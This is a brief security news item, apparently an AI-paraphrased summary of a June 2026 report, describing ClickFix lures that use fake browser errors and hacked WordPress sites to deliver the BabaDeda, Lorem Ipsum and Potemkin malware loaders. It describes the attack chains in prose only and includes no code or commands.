Key Point: Three new malware loaders (BabaDeda, Lorem Ipsum, Potemkin) distribute via ClickFix social engineering and compromised WordPress sites to enable data theft, ransomware, and remote control.
Attackers exploit the ClickFix method with forged browser error messages to trick users into manually executing PowerShell commands. This deploys three new malware loaders to Windows systems that serve as entry points for backdoors, infostealers, and ransomware.
Security researchers document campaigns using ClickFix lures to spread malware. Attackers spoof browser error messages or security warnings and trick users into manually executing PowerShell commands. These commands download loaders that act as the initial infection stage and decrypt and load additional malware. To date, three different loaders have been identified: BabaDeda, Lorem Ipsum, and Potemkin. All three employ techniques to bypass security mechanisms and encrypt their payloads only immediately before execution, making forensic analysis and detection by endpoint protection tools more difficult.
The BabaDeda loader was previously deployed against crypto and Web3 organizations but is now increasingly targeting education and financial organizations. The malware checks the system and refuses to run on computers in Russia or Belarus. After activation, the loader injects malicious functionality into legitimate Windows processes such as svchost.exe. The deployed backdoors and infostealers steal browser data, cookies, and credentials, create screenshots, and exfiltrate files to command servers. Researchers describe the revamped framework as “a much more capable loader designed for stealth, evasion, and payload flexibility.”
A second attacker, known as Vanilla Tempest, uses compromised WordPress websites as a distribution point for the Lorem Ipsum loader. Victims are redirected via ClickFix lures posing as security updates for Microsoft Edge. After infection, an outdated Node.js version is used to execute JavaScript-based droppers that load a backdoor. This chain frequently results in the deployment of ransomware such as Rhysida. Security researchers view the shift to compromised WordPress sites as a strategy that significantly expands the pool of potential victims.
A third campaign deploys the Potemkin loader, which is initiated via HTA files (HTML Application) in MSI package format. Potemkin uses a domain generation algorithm for communication with command servers and serves as a distribution channel for EtherRAT and RMMProject. The latter enables remote screen control, extraction of browser data while bypassing encryption protection, and execution of arbitrary Lua scripts. Once system access is established, attackers manually configure Microsoft Defender exclusions, set up tunneled access via Cloudflare, and spread laterally to the domain controller.
Source: www.it-daily.net · Published June 17, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.